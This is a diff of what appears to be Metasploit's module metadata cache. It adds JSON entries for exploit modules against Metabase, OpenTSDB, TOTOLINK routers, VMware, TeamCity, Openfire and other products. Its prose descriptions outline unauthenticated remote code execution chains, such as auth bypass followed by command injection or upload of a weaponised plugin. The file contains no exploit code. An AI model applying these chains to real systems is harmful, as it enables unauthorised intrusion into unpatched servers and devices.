+    "references": [
+      "URL-https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/",
+      "URL-https://www.metabase.com/blog/security-advisory",
+      "CVE-2023-38646"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 3000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2023-08-08 15:35:50 +0000",
+    "path": "/modules/exploits/linux/http/metabase_setup_token_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/metabase_setup_token_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/microfocus_obr_cmd_injection": {
    "name": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection",
    "fullname": "exploit/linux/http/microfocus_obr_cmd_injection",
@@ -68894,6 +70217,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/opentsdb_key_cmd_injection": {
+    "name": "OpenTSDB 2.4.1 unauthenticated command injection",
+    "fullname": "exploit/linux/http/opentsdb_key_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-01",
+    "type": "exploit",
+    "author": [
+      "Gal Goldstein",
+      "Daniel Abeles",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits an unauthenticated command injection\n          vulnerability in the key parameter in OpenTSDB through\n          2.4.1 (CVE-2023-36812/CVE-2023-25826) in order to achieve\n          unauthenticated remote code execution as the root user.\n\n          The module first attempts to obtain the OpenTSDB version via\n          the api. If the version is 2.4.1 or lower, the module\n          performs additional checks to obtain the configured metrics\n          and aggregators. It then randomly selects one metric and one\n          aggregator and uses those to instruct the target server to\n          plot a graph. As part of this request, the key parameter is\n          set to the payload, which will then be executed by the target\n          if the latter is vulnerable.\n\n          This module has been successfully tested against OpenTSDB\n          version 2.4.1.",
+    "references": [
+      "URL-https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw",
+      "CVE-2023-36812",
+      "CVE-2023-25826"
+    ],
+    "platform": "Linux",
+    "arch": "ARCH_CMD",
+    "rport": 4242,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2023-09-07 17:29:16 +0000",
+    "path": "/modules/exploits/linux/http/opentsdb_key_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/opentsdb_key_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/opentsdb_yrange_cmd_injection": {
    "name": "OpenTSDB 2.4.0 unauthenticated command injection",
    "fullname": "exploit/linux/http/opentsdb_yrange_cmd_injection",
@@ -70809,6 +72195,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/solarview_unauth_rce_cve_2023_23333": {
+    "name": "SolarView Compact unauthenticated remote command execution vulnerability.",
+    "fullname": "exploit/linux/http/solarview_unauth_rce_cve_2023_23333",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-05-15",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "CONTEC's SolarView™ Series enables you to monitor and visualize solar power and is only available in Japan.\n          This module exploits a command injection vulnerability on the SolarView Compact `v6.00` web application\n          via vulnerable endpoint `downloader.php`.\n          After exploitation, an attacker will have full access with the same user privileges under\n          which the webserver is running (typically as user `contec`).",
+    "references": [
+      "CVE-2023-23333",
+      "URL-https://attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "php, cmd, armle, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-09-05 17:06:01 +0000",
+    "path": "/modules/exploits/linux/http/solarview_unauth_rce_cve_2023_23333.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/solarview_unauth_rce_cve_2023_23333",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/sonicwall_cve_2021_20039": {
    "name": "SonicWall SMA 100 Series Authenticated Command Injection",
    "fullname": "exploit/linux/http/sonicwall_cve_2021_20039",
@@ -72083,6 +73531,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/totolink_unauth_rce_cve_2023_30013": {
+    "name": "TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability.",
+    "fullname": "exploit/linux/http/totolink_unauth_rce_cve_2023_30013",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-05-05",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Kazamayc https://github.com/Kazamayc"
+    ],
+    "description": "Multiple TOTOLINK network products contain a command insertion vulnerability in setting/setTracerouteCfg.\n          This vulnerability allows an attacker to execute arbitrary commands through the \"command\" parameter.\n          After exploitation, an attacker will have full access with the same user privileges under\n          which the webserver is running (typically as user `root`, ;-).\n\n          The following TOTOLINK network products and firmware are vulnerable:\n          - Wireless Gigabit Router model X5000R with firmware X5000R_V9.1.0u.6118_B20201102.zip;\n          - Wireless Gigabit Router model A7000R with firmware A7000R_V9.1.0u.6115_B20201022.zip;\n          - Wireless Gigabit Router model A3700R with firmware A3700R_V9.1.2u.6134_B20201202.zip;\n          - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6095_B20200916.zip;\n          - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6139_B20201216.zip;\n          - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6095_B20200916.zip;\n          - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6139_B20201216.zip;\n          - Wireless Extender model EX1200L with firmware EX1200L_V9.3.5u.6146_B20201023.zip; and\n          - probably more looking at the scale of impacted devices :-(",
+    "references": [
+      "CVE-2023-30013",
+      "URL-https://attackerkb.com/topics/xnX3I3PEgM/cve-2023-30013",
+      "URL-https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, mipsle",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-09-20 22:14:48 +0000",
+    "path": "/modules/exploits/linux/http/totolink_unauth_rce_cve_2023_30013.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/totolink_unauth_rce_cve_2023_30013",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/tp_link_ncxxx_bonjour_command_injection": {
    "name": "TP-Link Cloud Cameras NCXXX Bonjour Command Injection",
    "fullname": "exploit/linux/http/tp_link_ncxxx_bonjour_command_injection",
@@ -73224,6 +74735,137 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/vmware_vrli_rce": {
+    "name": "VMware vRealize Log Insight Unauthenticated RCE",
+    "fullname": "exploit/linux/http/vmware_vrli_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-24",
+    "type": "exploit",
+    "author": [
+      "Horizon3.ai Attack Team",
+      "Ege BALCI <egebalci@pm.me>"
+    ],
+    "description": "VMware vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as\n          directory traversal, broken access control, deserialization, and information disclosure.\n          When chained together, these vulnerabilities allow a remote, unauthenticated attacker to\n          execute arbitrary commands on the underlying operating system as the root user.\n\n          This module achieves code execution via triggering a `RemotePakDownloadCommand` command\n          via the exposed thrift service after obtaining the node token by calling a `GetConfigRequest`\n          thrift command. After the download, it will trigger a `PakUpgradeCommand` for processing the\n          specially crafted PAK archive, which then will place the JSP payload under a certain API\n          endpoint (pre-authenticated) location upon extraction for gaining remote code execution.\n\n          Successfully tested against version 8.0.2.",
+    "references": [
+      "ZDI-23-116",
+      "ZDI-23-115",
+      "CVE-2022-31706",
+      "CVE-2022-31704",
+      "CVE-2022-31711",
+      "URL-https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2023-0001.html"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "VMware vRealize Log Insight < v8.10.2"
+    ],
+    "mod_time": "2023-09-12 10:16:13 +0000",
+    "path": "/modules/exploits/linux/http/vmware_vrli_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/vmware_vrli_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
+  "exploit_linux/http/vmware_vrni_rce_cve_2023_20887": {
+    "name": "VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE",
+    "fullname": "exploit/linux/http/vmware_vrni_rce_cve_2023_20887",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-07",
+    "type": "exploit",
+    "author": [
+      "Sina Kheirkhah",
+      "Anonymous with Trend Micro Zero Day Initiative",
+      "h00die"
+    ],
+    "description": "VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection\n          when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a\n          remote unauthenticated attacker to execute arbitrary commands on the underlying operating system\n          as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.\n          VMware has evaluated the severity of this issue to be in the Critical severity range with a\n          maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the\n          context of 'root' on the appliance.\n          VMWare 6.x version are vulnerable.\n\n          This module exploits the vulnerability to upload and execute payloads gaining root privileges.\n          Successfully tested against version 6.8.0.",
+    "references": [
+      "CVE-2023-20887",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2023-0012.html",
+      "URL-https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/",
+      "URL-https://github.com/sinsinology/CVE-2023-20887"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-07-20 16:40:28 +0000",
+    "path": "/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/vmware_vrni_rce_cve_2023_20887",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/vmware_vrops_mgr_ssrf_rce": {
    "name": "VMware vRealize Operations (vROps) Manager SSRF RCE",
    "fullname": "exploit/linux/http/vmware_vrops_mgr_ssrf_rce",
@@ -73521,6 +75163,71 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/wd_mycloud_unauthenticated_cmd_injection": {
+    "name": "Western Digital MyCloud unauthenticated command injection",
+    "fullname": "exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2016-12-14",
+    "type": "exploit",
+    "author": [
+      "Erik Wynter",
+      "Steven Campbell",
+      "Remco Vermeulen"
+    ],
+    "description": "This module exploits authentication bypass (CVE-2018-17153) and\n          command injection (CVE-2016-10108) vulnerabilities in Western\n          Digital MyCloud before 2.30.196 in order to achieve\n          unauthenticated remote code execution as the root user.\n\n          The module first performs a check to see if the target is\n          WD MyCloud. If so, it attempts to trigger an authentication\n          bypass (CVE-2018-17153) via a crafted GET request to\n          /cgi-bin/network_mgr.cgi. If the server responds as expected,\n          the module assesses the vulnerability status by attempting to\n          exploit a commend injection vulnerability (CVE-2016-10108) in\n          order to print a random string via the echo command. This is\n          done via a crafted POST request to /web/google_analytics.php.\n\n          If the server is vulnerable, the same command injection vector\n          is leveraged to execute the payload.\n\n          This module has been successfully tested against Western Digital\n          MyCloud version 2.30.183.\n\n          Note: based on the available disclosures, it seems that the\n          command injection vector (CVE-2016-10108) might be exploitable\n          without the authentication bypass (CVE-2018-17153) on versions\n          before 2.21.126. The obtained results on 2.30.183 imply that\n          the patch for CVE-2016-10108 did not actually remove the command\n          injection vector, but only prevented unauthenticated access to it.",
+    "references": [
+      "CVE-2016-10108",
+      "CVE-2018-17153",
+      "URL-https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/",
+      "URL-https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "armle, cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-07-27 23:09:50 +0000",
+    "path": "/modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/wd_mycloud_unauthenticated_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/webcalendar_settings_exec": {
    "name": "WebCalendar 1.2.4 Pre-Auth Remote Code Injection",
    "fullname": "exploit/linux/http/webcalendar_settings_exec",
@@ -80385,7 +82092,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2022-06-23 16:28:10 +0000",
+    "mod_time": "2023-09-12 12:20:34 +0000",
    "path": "/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/nimbus_gettopologyhistory_cmd_exec",
@@ -86488,7 +88195,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2023-04-17 13:01:30 +0000",
+    "mod_time": "2023-08-08 14:47:14 +0000",
    "path": "/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb",
    "is_install_path": true,
    "ref_name": "multi/http/adobe_coldfusion_rce_cve_2023_26360",
@@ -87072,7 +88779,7 @@
    "author": [
      "Graeme Robinson"
    ],
-    "description": "This module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must\n          be unsecured (or credentials provided) and the ExecuteProcess processor must be available. An ExecuteProcessor\n          processor is created then is configured with the payload and started. The processor is then stopped and\n          deleted.",
+    "description": "This module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must\n          be unsecured (or credentials provided) and the ExecuteProcess processor must be available. An ExecuteProcessor\n          processor is created then is configured with the payload and started. The processor is then stopped and\n          deleted.\n\n          Verified against 1.12.1, 1.12.1-RC2, and 1.20.0",
    "references": [
      "URL-https://nifi.apache.org/",
      "URL-https://github.com/apache/nifi",
@@ -87100,7 +88807,7 @@
      "Unix (In-Memory)",
      "Windows (In-Memory)"
    ],
-    "mod_time": "2021-02-24 20:24:57 +0000",
+    "mod_time": "2023-08-28 17:39:02 +0000",
    "path": "/modules/exploits/multi/http/apache_nifi_processor_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/apache_nifi_processor_rce",
@@ -87117,6 +88824,9 @@
      "SideEffects": [
        "ioc-in-logs",
        "config-changes"
+      ],
+      "NOCVE": [
+        "abusing a feature"
      ]
    },
    "session_types": false,
@@ -91418,6 +93128,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/jetbrains_teamcity_rce_cve_2023_42793": {
+    "name": "JetBrains TeamCity Unauthenticated Remote Code Execution",
+    "fullname": "exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-09-19",
+    "type": "exploit",
+    "author": [
+      "sfewer-r7"
+    ],
+    "description": "This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution\n          against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are\n          vulnerable to this issue. The vulnerability was originally discovered by SonarSource.",
+    "references": [
+      "CVE-2023-42793",
+      "URL-https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis",
+      "URL-https://blog.jetbrains.com/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "cmd",
+    "rport": 8111,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows",
+      "Linux"
+    ],
+    "mod_time": "2023-09-28 13:13:12 +0000",
+    "path": "/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/jetbrains_teamcity_rce_cve_2023_42793",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/jira_hipchat_template": {
    "name": "Atlassian HipChat for Jira Plugin Velocity Template Injection",
    "fullname": "exploit/multi/http/jira_hipchat_template",
@@ -94226,7 +95997,7 @@
      "Windows x86 (Native Payload)",
      "Linux x86 (Native Payload)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-07-14 12:47:04 +0000",
    "path": "/modules/exploits/multi/http/openfire_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "multi/http/openfire_auth_bypass",
@@ -94238,6 +96009,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/openfire_auth_bypass_rce_cve_2023_32315": {
+    "name": "Openfire authentication bypass with RCE plugin",
+    "fullname": "exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-05-26",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "Openfire is an XMPP server licensed under the Open Source Apache License.\n          Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack\n          via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment\n          in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for\n          administrative users.\n          This module will use the vulnerability to create a new admin user that will be used to upload a Openfire management plugin\n          weaponised with java native payload that triggers an RCE.\n          This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n          The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the\n          first version on the 4.8 branch, which is version 4.8.0.",
+    "references": [
+      "CVE-2023-32315",
+      "URL-https://attackerkb.com/topics/7Tf5YGY3oT/cve-2023-32315",
+      "URL-https://github.com/miko550/CVE-2023-32315",
+      "URL-https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm"
+    ],
+    "platform": "Java",
+    "arch": "java",
+    "rport": 9090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Java Universal"
+    ],
+    "mod_time": "2023-07-18 08:38:06 +0000",
+    "path": "/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/openfire_auth_bypass_rce_cve_2023_32315",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/openmediavault_cmd_exec": {
    "name": "OpenMediaVault Cron Remote Command Execution",
    "fullname": "exploit/multi/http/openmediavault_cmd_exec",
@@ -96939,6 +98772,67 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/rudder_server_sqli_rce": {
+    "name": "Rudder Server SQLI Remote Code Execution",
+    "fullname": "exploit/multi/http/rudder_server_sqli_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-16",
+    "type": "exploit",
+    "author": [
+      "Ege Balcı <egebalci@pm.me>"
+    ],
+    "description": "This Metasploit module exploits a SQL injection vulnerability in\n          RudderStack's rudder-server, an open source Customer Data Platform (CDP).\n          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.\n          By exploiting this flaw, an attacker can execute arbitrary SQL commands,\n          which may lead to Remote Code Execution (RCE) due to the `rudder` role\n          in PostgreSQL having superuser permissions by default.",
+    "references": [
+      "CVE-2023-30625",
+      "URL-https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/",
+      "URL-https://nvd.nist.gov/vuln/detail/CVE-2023-30625"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2023-07-31 15:13:35 +0000",
+    "path": "/modules/exploits/multi/http/rudder_server_sqli_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/rudder_server_sqli_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/sflog_upload_exec": {
    "name": "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
    "fullname": "exploit/multi/http/sflog_upload_exec",
@@ -97484,6 +99378,71 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/sonicwall_shell_injection_cve_2023_34124": {
+    "name": "Sonicwall",
+    "fullname": "exploit/multi/http/sonicwall_shell_injection_cve_2023_34124",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-12",
+    "type": "exploit",
+    "author": [
+      "fulmetalpackets <fulmetalpackets@gmail.com>",
+      "Ron Bowes <rbowes@rapid7.com>"
+    ],
+    "description": "This module exploits a series of vulnerabilities - including auth\n          bypass, SQL injection, and shell injection - to obtain remote code\n          execution on SonicWall GMS versions <= 9.9.9320.",
+    "references": [
+      "URL-https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/",
+      "CVE-2023-34124",
+      "CVE-2023-34133",
+      "CVE-2023-34132",
+      "CVE-2023-34127"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": "443",
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Dropper",
+      "Windows Command",
+      "Linux Command"
+    ],
+    "mod_time": "2023-09-06 14:11:29 +0000",
+    "path": "/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/sonicwall_shell_injection_cve_2023_34124",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/splunk_mappy_exec": {
    "name": "Splunk Search Remote Code Execution",
    "fullname": "exploit/multi/http/splunk_mappy_exec",
@@ -98728,6 +100687,71 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/subrion_cms_file_upload_rce": {
+    "name": "Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE",
+    "fullname": "exploit/multi/http/subrion_cms_file_upload_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-11-04",
+    "type": "exploit",
+    "author": [
+      "Hexife",
+      "Fellipe Oliveira",
+      "Ismail E. Dawoodjee"
+    ],
+    "description": "This module exploits an authenticated file upload vulnerability in\n          Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by\n          the .htaccess file not preventing the execution of .pht, .phar, and\n          .xhtml files. Files with these extensions are not included in the\n          .htaccess blacklist, hence these files can be uploaded and executed\n          to achieve remote code execution. In this module, a .phar file with\n          a randomized name is uploaded and executed to receive a Meterpreter\n          session on the target, then deletes itself afterwards.",
+    "references": [
+      "EDB-49876",
+      "CVE-2018-19422",
+      "URL-https://github.com/intelliants/subrion/issues/801",
+      "URL-https://github.com/intelliants/subrion/issues/840",
+      "URL-https://github.com/advisories/GHSA-73xj-v6gc-g5p5"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP"
+    ],
+    "mod_time": "2023-08-02 10:10:27 +0000",
+    "path": "/modules/exploits/multi/http/subrion_cms_file_upload_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/subrion_cms_file_upload_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/sugarcrm_webshell_cve_2023_22952": {
    "name": "SugarCRM unauthenticated Remote Code Execution (RCE)",
    "fullname": "exploit/multi/http/sugarcrm_webshell_cve_2023_22952",
@@ -99192,6 +101216,74 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/torchserver_cve_2023_43654": {
+    "name": "PyTorch Model Server Registration and Deserialization RCE",
+    "fullname": "exploit/multi/http/torchserver_cve_2023_43654",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-10-03",
+    "type": "exploit",
+    "author": [
+      "Idan Levcovich",
+      "Guy Kaplan",
+      "Gal Elbaz",
+      "Swapneil Kumar Dash",
+      "Spencer McIntyre"
+    ],
